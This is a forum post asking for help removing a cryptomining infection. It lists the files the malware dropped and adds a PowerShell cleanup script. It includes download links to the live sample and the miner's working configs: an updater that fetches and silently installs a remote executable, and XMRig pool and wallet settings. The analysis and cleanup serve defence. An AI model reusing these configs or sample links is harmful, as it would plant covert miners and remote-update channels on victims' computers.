This post was last edited by 落尘之木 on 2018-1-3 10:02
It started when I downloaded and ran a software installer. Things looked wrong so I closed it right away, but somehow I still got infected: ads kept popping up and the screen turned yellow. I found a mining script in Task Manager; I have already deleted it from my computer, but I don't know whether anything is left behind. The virus created a scheduled task and I don't know how to remove it. Could some expert analyze where it is?
This thing even carries a legitimate digital signature.
Here is the original file of the virus sample.
Direct link: https://attachments-cdn.shimo.im ... 9/MainServices2.zip
Cloud drive link: https://pan.baidu.com/s/1bpHbyMj password: 18sm
After running, it drops the mining script into C:\Program Files\System Native\Main Services, 5 files in total:
updater.ini
updater.exe
service_box.exe
config.json
check_service.vbs
Contents of updater.ini:

```ini
[General]
AppDir=C:\Program Files\System Native\Main Services\
ID={CE766360-28C8-4FCF-A5EE-F716A678A26E}
ApplicationName=Main Services
CompanyName=System Native
ApplicationVersion=1.1.14
DefaultCommandLine=/silentall
CheckFrequency=1
DownloadsFolder=C:\ProgramData\System Native\Main Services\updates\
Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI
SupportServiceName=updater
URL=http://www.temp.uno/ms.txt
```
Contents of ms.txt, downloaded from the URL above; it holds the download entry for the virus file:

```ini
;aiu;
[Update #5]
NoGUICommandLineSwitch = /quiet PID=0 SUBID=0
Name = Main Services
ProductVersion = 1.1.14.0
URL = https://1406588359.rsc.cdn77.org/files/MainServices2.exe
Size = 3107168
MD5 = 0759d7d716397ea852b7726150432b95
ServerFileName = MainServices2.exe
Flags = Critical|SilentInstall|Advertises
RegistryKey = HKUD\Software\System Native\Main Services\Version
Version = 1.1.14.0
```
Contents of config.json:

```json
{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "background": true,     // true to run the miner in the background
    "colors": true,         // false to disable colored output
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 0,      // donate level, mininum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 65,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,       // print hashrate report every N seconds
    "retries": 1,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "xmr1.temp.uno:3334",
            "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
            "pass": "x",
            "keepalive": true,
            "nicehash": true
        },
        {
            "url": "xmr2.temp.uno:3334",
            "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
            "pass": "x",
            "keepalive": true,
            "nicehash": true
        },
        {
            "url": "xmr3.temp.uno:3334",
            "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
            "pass": "x",
            "keepalive": true,
            "nicehash": true
        },
        {
            "url": "xmr4.temp.uno:3334",
            "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
            "pass": "x",
            "keepalive": true,
            "nicehash": true
        },
        {
            "url": "xmr.temp.uno:3334",
            "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
            "pass": "x",
            "keepalive": true,
            "nicehash": true
        }
    ],
    "api": {
        "port": 8117,           // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,   // access token for API
        "worker-id": null       // custom worker-id for API
    }
}
```
Contents of check_service.vbs:

```vbscript
' Query WMI for a service whose Name is 'service_box.exe' and (re)start it.
Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='service_box.exe'")
For Each Service In ServiceSet
    RetVal = Service.StartService()
Next
```
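An added example, not from the original post, that hunts for the persistence this sample leaves behind (the scheduled task the poster could not locate, the service started by check_service.vbs, the updater's registry key and the drop folders). It assumes only the paths and names quoted above; HKUD in ms.txt is read as HKLM because of the PerMachine flag, with HKCU checked as well. Run from an elevated PowerShell prompt.

```powershell
# Added example, not part of the original post. Assumes the drop folder,
# the 'System Native' registry key and the service name 'service_box.exe'
# exactly as quoted in the post. Set $Remove to $true to clean up.
$Remove  = $false
$dropDir = 'C:\Program Files\System Native\Main Services'
$dataDir = 'C:\ProgramData\System Native\Main Services'
$svcName = 'service_box.exe'
$marker  = '*System Native*'

# 1. Scheduled tasks whose action launches anything under the drop folder.
$tasks = Get-ScheduledTask | Where-Object {
    $_.Actions | Where-Object { "$($_.Execute) $($_.Arguments)" -like $marker }
}
$tasks | Select-Object TaskName, TaskPath, State | Format-Table -AutoSize

# 2. Services the VBS helper restarts, or whose binary lives in the drop folder.
$services = Get-CimInstance Win32_Service | Where-Object {
    $_.Name -eq $svcName -or $_.PathName -like $marker
}
$services | Select-Object Name, State, StartMode, PathName | Format-Table -AutoSize

# 3. Processes currently running from the drop folder (updater.exe, service_box.exe).
$procs = Get-Process | Where-Object { $_.Path -like "$dropDir*" }
$procs | Select-Object Id, ProcessName, Path | Format-Table -AutoSize

# 4. Registry keys written by the updater (Version value under Main Services).
$regKeys = @('HKLM:\Software\System Native', 'HKCU:\Software\System Native') |
    Where-Object { Test-Path $_ }
$regKeys | ForEach-Object { Get-ChildItem $_ -Recurse }

if ($Remove) {
    $tasks | ForEach-Object {
        Unregister-ScheduledTask -TaskName $_.TaskName -TaskPath $_.TaskPath -Confirm:$false
    }
    $procs | Stop-Process -Force
    $services | ForEach-Object {
        Stop-Service -Name $_.Name -Force -ErrorAction SilentlyContinue
        sc.exe delete "$($_.Name)"      # remove the service definition
    }
    $regKeys | Remove-Item -Recurse -Force
    @($dropDir, $dataDir) | Where-Object { Test-Path $_ } | Remove-Item -Recurse -Force
}
```

Review the listed tasks, services and processes before flipping $Remove, since the match is on the folder name and not on file hashes.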